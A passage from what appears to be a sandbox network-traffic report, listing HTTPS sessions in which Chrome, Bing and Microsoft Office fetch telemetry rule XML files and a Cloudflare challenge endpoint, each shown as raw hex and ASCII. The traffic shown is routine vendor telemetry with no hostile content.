                                                                                                                                                            2024-10-08 03:08:52 UTC1OUTData Raw: 3c
                                                                                                                                                            Data Ascii: <
                                                                                                                                                            2024-10-08 03:08:52 UTC2483OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                                                                                                            Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            31192.168.2.549757104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:52 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82 HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:52 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:52 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 7
                                                                                                                                                            Connection: close
                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                            cf-chl-out: gpVFH2eSdbaisvq5h1CTzbzvUM9W/8AlAvs=$xI+Pt+cXCU71lUw1
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2edce99234388-EWR
                                                                                                                                                            2024-10-08 03:08:52 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                            Data Ascii: invalid


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            32192.168.2.54975813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:53 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:53 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 474
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                            x-ms-request-id: 1be53f37-001e-00a2-0266-17d4d5000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030853Z-1657d5bbd48gqrfwecymhhbfm800000003a00000000022b8
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:53 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            33192.168.2.54976113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:53 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:53 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 632
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                            x-ms-request-id: 15158de7-401e-0029-4b00-179b43000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030853Z-1657d5bbd48brl8we3nu8cxwgn00000004mg00000000r2qk
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:53 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            34192.168.2.54975913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:53 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:53 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 415
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                            x-ms-request-id: 1707b783-801e-00a3-53e5-167cfb000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030853Z-1657d5bbd48xdq5dkwwugdpzr000000004rg000000008phx
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:53 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            35192.168.2.54976013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:53 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:53 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 471
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                            x-ms-request-id: 73fc0cc0-d01e-008e-5fee-16387a000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030853Z-1657d5bbd48xsz2nuzq4vfrzg8000000049g0000000071yh
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:53 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            36192.168.2.54974913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:53 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:53 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 450
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                            x-ms-request-id: d4448e94-101e-00a2-2703-179f2e000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030853Z-1657d5bbd48qjg85buwfdynm5w00000004e000000000gr8v
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:53 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            37192.168.2.54976313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:54 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:54 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 407
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                            x-ms-request-id: 789c8418-601e-0032-5905-17eebb000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030854Z-1657d5bbd48xsz2nuzq4vfrzg800000004a0000000005326
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:54 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            38192.168.2.54976613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:54 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:54 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 486
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                            x-ms-request-id: bf7deccb-401e-0064-0f0e-1754af000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030854Z-1657d5bbd48xdq5dkwwugdpzr000000004q000000000edd6
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:54 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            39192.168.2.54976213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:54 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:54 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 467
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                            x-ms-request-id: 87fc294c-201e-0051-40f3-167340000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030854Z-1657d5bbd48q6t9vvmrkd293mg000000048g00000000r83p
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:54 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            40192.168.2.54976413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:54 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:54 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 486
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                            x-ms-request-id: 109d4e4b-c01e-002b-2299-186e00000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030854Z-1657d5bbd48hzllksrq1r6zsvs00000001g000000000rd89
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:54 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
